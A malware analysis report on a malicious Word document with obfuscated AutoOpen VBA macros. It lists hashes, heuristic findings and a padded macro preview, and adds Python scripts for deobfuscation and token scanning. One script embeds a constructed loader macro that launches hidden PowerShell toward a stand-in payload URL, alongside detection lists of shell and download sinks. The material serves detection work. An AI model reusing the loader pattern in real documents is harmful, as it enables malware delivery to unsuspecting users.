Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0936354aa36df993…

MALICIOUS

Office (OLE)

Size: 213.5 KB
Created: 2018-10-22 14:01:00
Authoring application: Microsoft Office Word
First seen: 2019-01-12
MD5: 7e7d7fc6413ea8eab79e1f944fba33fd
SHA-1: ccf3642e310dbf1a1cad414489c0eee8eeedf5ab
SHA-256: 0936354aa36df993d818a1c5e1932ede531089b7c774fba3baaac446a755e219
Risk score: 322

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample contains obfuscated VBA macros with an AutoOpen entry point, so the code runs as soon as the document is opened with macros enabled. The Shell() call in the VBA is the strongest single indicator of malicious intent; in this loader shape it is most likely used to download and execute a second-stage payload. The document body also instructs the user to 'Enable Content', a social-engineering lure for getting past Office's default macro blocking. Note that none of the heuristics below evidences an exploit: execution depends on the user enabling macros, which is user execution of a malicious file (T1204.002) rather than exploitation, so the T1203 mapping is not supported by these findings.
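The obfuscation described above is usually recoverable statically, without running the macro. The Python script below is an added example written for this report; it is not code from the analysis platform, from oletools, or from the sample. It strips comment lines, records the auto-exec entry points and execution sinks visible in the raw source, then folds the three decoder shapes the heuristics name (Chr()/ChrW() numeric char arrays, hex-string literals handed to a decoder, junk-token Replace calls) back into literal strings and rescans, so the indicators the loader hides become visible. The macro text, the helper name Decode and the URL inside it are constructed for illustration; the real macros.bas would be fed in as olevba's extracted source.

```python
"""Static triage of VBA macro source: find auto-exec entry points and execution
sinks, then fold common string-building decoders (Chr()/ChrW() numeric arrays,
hex-string literals, junk-token Replace calls) so hidden indicators surface.

Added example for this report. Not code from the analysis platform, oletools,
or the sample. SAMPLE_VBA and the Decode() helper it calls are constructed.
"""
import re
from typing import Dict, List

AUTOEXEC_NAMES = ("AutoOpen", "Auto_Open", "AutoExec", "AutoClose",
                  "Document_Open", "Document_Close", "Workbook_Open")
SINK_NAMES = ("Shell", "CreateObject", "GetObject", "WScript.Shell",
              "ShellExecute", ".Run", "XMLHTTP", "ADODB.Stream")

# Constructed macro in the loader shape the heuristics describe; it is not the
# analysed document's code. Decode() stands in for a custom hex-string decoder.
SAMPLE_VBA = r'''
' random junk comments like those in the extracted module are ignored
Sub AutoOpen()
    Dim o As Object, c As String
    Set o = CreateObject(Replace("WS##cr##ipt.S##hel##l", "##", ""))
    c = Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108)
    o.Run c & " -w hidden " & Decode("687474703a2f2f6578616d706c652e696e76616c69642f7061796c6f6164")
End Sub
'''

# Chr(n) & Chr(n) ... runs, hex-only string literals, and Replace(str, old, new)
_CHR_RUN = re.compile(r'ChrW?\(\s*\d+\s*\)(?:\s*&\s*ChrW?\(\s*\d+\s*\))*')
_CHR_NUM = re.compile(r'ChrW?\(\s*(\d+)\s*\)')
_HEX_STR = re.compile(r'"((?:[0-9A-Fa-f]{2}){4,})"')
_REPLACE = re.compile(r'Replace\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)')


def _fold_chr_runs(src: str) -> str:
    """Chr(112) & Chr(111) ... -> "po..." (numeric char-array decoder)."""
    return _CHR_RUN.sub(
        lambda m: '"%s"' % "".join(chr(int(n)) for n in _CHR_NUM.findall(m.group(0))), src)


def _fold_hex_strings(src: str) -> str:
    """"6874..." -> "ht..." when the bytes are printable ASCII (hex-string decoder)."""
    def repl(m):
        raw = bytes.fromhex(m.group(1))
        return '"%s"' % raw.decode("ascii") if all(32 <= b < 127 for b in raw) else m.group(0)
    return _HEX_STR.sub(repl, src)


def _fold_replace(src: str) -> str:
    """Replace("WS##cr##ipt", "##", "") -> "WScript" (junk-token removal)."""
    def repl(m):
        s, old, new = m.groups()
        return '"%s"' % s.replace(old, new) if old else m.group(0)
    return _REPLACE.sub(repl, src)


def deobfuscate(src: str, max_rounds: int = 5) -> str:
    """Apply the folds until the text stops changing (decoders are often nested)."""
    for _ in range(max_rounds):
        new = _fold_replace(_fold_hex_strings(_fold_chr_runs(src)))
        if new == src:
            break
        src = new
    return src


def triage(src: str) -> Dict[str, List[str]]:
    """Compare indicators visible in the raw source with those visible after folding."""
    code = "\n".join(line for line in src.splitlines() if not line.lstrip().startswith("'"))
    decoded = deobfuscate(code)
    low, low_dec = code.lower(), decoded.lower()
    return {
        "autoexec": [n for n in AUTOEXEC_NAMES
                     if re.search(r"\bSub\s+%s\b" % re.escape(n), code, re.I)],
        "sinks_in_source": [s for s in SINK_NAMES if s.lower() in low],
        "sinks_after_decode": [s for s in SINK_NAMES if s.lower() in low_dec],
        "urls": re.findall(r'https?://[^\s"\']+', decoded),
        "strings": re.findall(r'"([^"]{4,})"', decoded),
        "decoded_source": [decoded],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(key, value)
```

Against the real module run triage(open('macros.bas', encoding='latin-1').read()); the difference between sinks_in_source and sinks_after_decode is exactly what OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER is scoring. Decoders that do arithmetic on the character codes, or assemble values at runtime from document properties or form controls, need the expression evaluated rather than pattern-folded; that is where olevba's --deobf option and a VBA emulator take over.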

Heuristics (9)

  • CLAMAV_DETECTION [critical] ClamAV signature match
    ClamAV detected this file as malware: Doc.Malware.Generic-6923090-0
  • OLE_VBA_MACROS [medium, 4 related findings] VBA macros detected
    The document contains VBA macro code.
  • OLE_VBA_SHELL [critical] Shell() call in VBA
    The macro source calls Shell(), which launches an arbitrary external command line from VBA.
  • OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER [critical] Obfuscated auto-exec VBA loader
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This loader shape keeps CreateObject/Shell/URL indicators out of the visible macro source, so plain string matching on the source misses them.
  • OLE_VBA_AUTOOPEN [high] AutoOpen macro
    The VBA project defines an AutoOpen procedure, which Word runs as soon as the document is opened with macros enabled.
  • OLE_VBA_PCODE_AUTOEXEC_EXEC [high] VBA p-code auto-exec with execution tokens
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents and documents whose source extraction failed, where no visible source is available.
  • OLE_LEGACY_WORDBASIC_AUTOEXEC [medium] Legacy WordBasic auto-exec macro marker
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, with no stronger macro-virus family marker present. On its own this is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution. The rule's generic description assumes that no modern VBA project was recovered, which is not the case here (a VBA project was extracted as macros.bas, below); the AutoOpen marker almost certainly belongs to that project, so treat this finding as overlapping with OLE_VBA_AUTOOPEN rather than as independent evidence.
  • SE_ENABLE_LURE [medium] Macro/content-enable lure
    The document instructs the user to enable macros or editing, a common technique used by droppers to get past Office macro security settings.
  • EMBEDDED_URL [info] Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace identifier that Office embeds in its own files; it is not a network indicator and should not be blocked or hunted on.
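When source extraction fails, or the project only carries compiled p-code, the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic above falls back to token presence in the raw VBA streams. The script below is an added example, not the platform's detector and not oletools code: it searches a stream for auto-exec and execution identifiers in both ASCII and UTF-16LE (VBA projects store identifier names in both forms), matches case-insensitively because identifier case is not preserved reliably in the caches, and raises the same two-condition verdict the heuristic describes. SAMPLE_STREAM and BENIGN_STREAM are constructed byte blobs, not bytes from this sample; on a real file the bytes would come from olefile, for example olefile.OleFileIO(path).openstream(['Macros', 'VBA', 'Module1']).read() (assumed stream path for a Word .doc).

```python
"""Token-level scan of a raw VBA stream for an auto-exec entry together with
execution/download identifiers: the fallback used when macro source cannot be
decompressed or was deliberately stripped (p-code-only documents).

Added example for this report, not the platform's detector or oletools code.
SAMPLE_STREAM and BENIGN_STREAM are constructed blobs, not bytes from the sample.
"""
import re
from typing import Dict, List, Tuple

AUTOEXEC_TOKENS = ("AutoOpen", "Auto_Open", "AutoExec", "Document_Open", "Workbook_Open")
EXEC_TOKENS = ("Shell", "CreateObject", "WScript.Shell", "ShellExecute",
               "URLDownloadToFile", "XMLHTTP", "ADODB.Stream")

# Constructed: identifier-table style bytes with names in UTF-16LE and ASCII,
# separated by arbitrary filler. The byte offsets noted are used in the checks.
SAMPLE_STREAM = (
    bytes.fromhex("cc61ffff0000")                 # filler, 6 bytes
    + "AutoOpen".encode("utf-16le")               # offset 6, 16 bytes
    + bytes.fromhex("0000")
    + b"Module1"
    + bytes.fromhex("ff00")
    + "createobject".encode("utf-16le")           # offset 33, lower case on purpose
    + bytes.fromhex("1f00")
    + b"wscript.shell"                            # offset 59; "shell" at 67
    + bytes.fromhex("00")
)
BENIGN_STREAM = bytes.fromhex("cc61") + "AutoOpen".encode("utf-16le") + b"\x00Module1\x00"

Hit = Tuple[str, int]  # (encoding, byte offset)


def find_token(data: bytes, token: str) -> List[Hit]:
    """Locate token in ASCII and UTF-16LE, ignoring ASCII letter case."""
    hits: List[Hit] = []
    for enc in ("ascii", "utf-16le"):
        pat = re.compile(re.escape(token.encode(enc)), re.IGNORECASE)
        hits.extend((enc, m.start()) for m in pat.finditer(data))
    return hits


def scan_stream(data: bytes) -> Dict[str, Dict[str, List[Hit]]]:
    """Group hits by the two token classes the heuristic needs."""
    return {
        "autoexec": {t: h for t in AUTOEXEC_TOKENS if (h := find_token(data, t))},
        "exec": {t: h for t in EXEC_TOKENS if (h := find_token(data, t))},
    }


def pcode_autoexec_exec(data: bytes) -> bool:
    """Fire only when an auto-exec token and at least one execution token co-occur."""
    found = scan_stream(data)
    return bool(found["autoexec"]) and bool(found["exec"])


if __name__ == "__main__":
    print(scan_stream(SAMPLE_STREAM))
    print("OLE_VBA_PCODE_AUTOEXEC_EXEC:",
          pcode_autoexec_exec(SAMPLE_STREAM), pcode_autoexec_exec(BENIGN_STREAM))
```

Module streams hold their source MS-OVBA-compressed, so either decompress them first (olevba does) or point the scan at the other streams of the VBA storage, the _VBA_PROJECT and __SRP_* caches, which is what the heuristic means by "VBA/cache stream". A token hit proves the identifier is present, not that it sits on the AutoOpen call path, which is why this rule is rated high rather than critical and is corroborated here by the source-level findings.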

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 149418 bytes
SHA-256: 92026ac5b34c677100066918ab33853530bab0200c813eea2604fa8f8562d04c

Preview (first 1,000 lines of the extracted script). Module1 opens with many lines of random-character comments, padding that the VBA interpreter ignores but that bulks out the module and pushes the live code away from the top of the file:
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
' f dft .dTEi.unF o bd ETSineI  IEndnnFnoeu b
' eif.ufSbTetu  o  Tdnnfdb n.  .ccEdFEu InuITucn  n Edinn SeSIEEnn TnEttc   F  icn o unT Fendo  Scd
' innn fE.nSSndo  e T tuS nE  be hicnenntSnn o.ntI.hnoiFidefuebnISd nde
' nuun FFddc.n nt .eccn tunid Fu b ncnh no
' o IIoTEoTIcSS hioSFehnhfFuSSonoc.EFitnu TnnSId I.n EeSuInuFSndS  b FodIbubihd Snoi.SIEFn.nEubeES
'  fcnn   tbd  du  t EiEcuFn.EFcn   TnIuEenFnIEn.tnS ictE STnTfhdS
' u SE  uoiTnuEcnnn.Fu uEenoe eEbT
' nedt  e fFuidn nStcn t  Tn bId b nhuFunofh u n bbhn  nhd inF dFd.uTIhIo
' bEh   unS  dfcSIo.tbtnFIFFnhe Ee doF hu.F n budFhu ub heIScbEfedoen c nEn
' eFT Ii Iuu tISe cutIen ocFEuon.b tScF f  n nuhIun TFicSnn
' bIoFdcII  fu.uhnno.nc.bdndthF  un bT nbon uoiu .e.inne c ndhTETFnoSTeuo cEIn Fhfho Fhnn EcITioFdt n
' n.inu  f F.he b InnbuIonce udnd n fd dnEInn.fn E EotI nnETbSt c  nIuhEecIdo
' nfeTb  bF ocnef du  FTTic .u.IIue.FnhTn  uTu  euntnuSn SIndfc hTdnt  uFeeboSTun ocFIn n n inTIi
' fTF.ndSIn Sb I unncchFnE I ouhconu.I
' c  Iin dunIcoSe FoSnnoih  u nnSt  tFiuenntSIeFh. nnFcT cinenno TofTdTinF .un   Ffe
' ode hfntf eEuinbnIEnubucnEFhEc EE Suc F on dinnnT nE.nn   Fihe  Fu.FcnunTnthuun TdTn nn   n  ne
'   nfcibneTEdnndIn InIte EdE oc neT hit  ie.f.nnnoec nnnn t n.
' fFT e unuFhFhnnEESnn  iuiioiETuTdubufnfo u SEentFcti f  n. uh idEnTn  . nnhb c.bnenT
' n Enuen nd oFnc i.tSTu   ouceiuncFiu
' Etnbtcn.TSIEEbnn  nu bi fS o
'   nhI tt F i nn Ef  onnT ST Fdnu u.oTf.I uot Iounict Ehon oIhSofuIuofubT IiuubuTnfd.b E
' tu bSbnbtub nFineSTtihtub  FSnFtFdScfTcoFndnT nnnbnnIFFh cndn nI i  uFeTIeEcTbtd I
' cftEuidSc nffnf .ffn hIn n  nnbTnFFt   EtfooFdb S tiE  nd FI
' u uucf.dih hh nfoEuh uE.udhi onhe
' .toe.fnFfeEdnt i  nI iun FfEnenc.dncueueh IS.fTFtIo.ninI nnffthbif ceunFdbIf.F
' III.i TF .b cSnd c u nnn uouFIniI ctu TuftnIfhtEuSn  EtnunnSn buninFFiucStnnhcIbe
' .TcIdnnci nn iSceue cn. b  TdeintiFuTnibu ohTiuf. en
' Io InhIuuT eunbbT be  h u ino T  TnuttnSb d T
' .Fid Sc.dFSd oEuE ntfbFch.nn SSdno.E nS n i IdSn n
' bTn.utcn.   nnTE f ..   nI oTinhicnEo n bTFniccttSnnnfInT TS.dedni
'  fuE nnfhEuInnnFh.binbeS Eh n binF cuT ncnfIib IFoftI e.iucnnfu E En
'  u.unonbh bonondon.n bnSuuccn eShnF nd uunIebnIddf F tu nhtddIuhcTonh. ub.nf cEcune
'  hfnuhdeiEdiE EuftdEh c fIEdt uudSb S on EunE  fh uf Th.c. TnF  eTnheF    ntSuo.nS dE
' cuiSo  nu nnoneSn   IT bhTiT b Su
' dnT  b.EhciEnnc nudeS ue.Fcth.cnen bnt nn hcEhI IF i F  b ni   SFneenbTEuIdnn
'  todnIhdon  bni hSEudht d b.tIhffnuffeThbuEn E .b dFS.  ohdeciTf ncnToee tEnnu tn .e  nnS hoeEc.f
' fFSbbufn un i  uuoEnEdTfFuuTfnbnntb  ohhben Ff.iEunob  ESfb   hFdTfn ft  nS  hbd .nFbfn IS tftn
' Sbnnfn n uncu In obodTuTdcbSieSnhnnFnn noc  uTu. dbuu infFdcfe  ETFnFdEdb TebInF tSdfnf
' in  Itnu nuchT  dcu funfTbFi nin.uF nfoueT uoIninh
' f  fn u uuFnTbce ES IInffunnFh.dT neihfdnfEcudc T u nhFhuhFnoFE tndoi
' .T c hTuEth n Ece IfSnubFeS.FoSbIhunEbESnF ucfe it nnFtF.uennuSeu iTiT ebhi.und SuiIn
' btfnofFdhcfnTuTif .ufd TucFcS fuiE nnunu huI I nufohduudSb   neT . nSnhbtnde      ic cdEncc F  n F
' i eS u .bd.no fSn n uF.F  ud  neibTIhn u I.bdF ie nnIFStdnn.boSnnbn
'   F Ibinh fEndun Ffhd  SufnnFdntnSeFF uuE iE.InE I  e c ISef.nFIcnubSuuuonbS
' dubfeduEuoItidn  uIno  .  FSn u
' nhdIunnTu u.oh   nnnh  Ff ch Sn
' .TIncfcu tFFooFhn nEbnoiS de   .hcfFn Fhn Tf . n
' huInfnnIuci ISEh iT TEn idnS  uteSn uFo tonFn
'   TIecuEninh FonFitnenhouFd icE  nnn
' fn  en h.ETnS tnhoc EufI uo u ne TnuIdS. tn TnE udfu. c STutnoFnddftc  t c nhhEbIuubnin Tf T.chnn
' F    n c hI cnnniFE uuInnuTh Sn ncunn Enh  inc I.Sfii   tIFb TtS.  oS
' EF eehbnI n  Tn uIct ebE o.T FIndun Tn  tncS .e
' ITooneEnhuun dIuubIT tfIFonnTot.hbti  Suctd nFu Iu.t
' dc cF Su. bhT cnFcieb.honuunci nnE T.edeo
' te. . b   uffnnnn dcnfbSnne
... (truncated)